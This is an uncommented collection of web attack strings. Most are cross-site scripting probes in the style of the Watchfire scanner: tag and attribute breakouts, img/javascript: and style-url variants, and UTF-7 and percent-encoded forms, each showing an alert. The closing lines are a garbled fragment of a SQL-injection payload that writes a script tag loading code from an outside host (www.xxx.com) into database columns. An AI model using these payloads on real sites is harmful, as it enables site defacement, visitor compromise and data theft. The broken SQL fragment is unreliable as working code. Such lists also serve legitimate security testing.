[1] >'><script>alert('Watchfire XSS Test Successful')</script>
[2] >"><script>alert("Watchfire XSS Test Successful")</script>
[3] </TextArea><script>alert('Watchfire XSS Test Successful')</script>
///图片跨站
[4] >"'><img src="javascript:alert('Watchfire XSS Test Successful')">
[5] >"'><img src=javascript:alert("Watchfire XSS Test Successful")>
[6] " style="background:url(javascript:alert('Watchfire XSS Test Successful'))" OA="
[7] --><script>alert('Watchfire XSS Test Successful')</script>
[8] '+alert('Watchfire XSS Test Successful')+'
[9] "+alert('Watchfire XSS Test Successful')+"
[10] >'><%00script>alert('Watchfire XSS Test Successful')</script> (.NET 1.1 specific variant)
[11] >"><%00script>alert("Watchfire XSS Test Successful")</script> (.NET 1.1 specific variant)
[12] >+ACI-+AD4-+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-
[13] %A7%A2%BE%Bc%F3%E3%F2%E9%F0%F4%Be%E1%Ec%E5%F2%F4%A8%A7Watchfire%20XSS%20Test%20Successful%A7%A9%Bc%Af%F3%E3%F2%E9%F0%F4%Be
///-------------------------------------
exec('Updata ['+@t+'] set ['+@c+'] = rtrim(convert(varchar,['+#c+']))') ???
cast("></title><script> src=http://www.xxx.com/xx.js</script><!-- as varchar(67))')f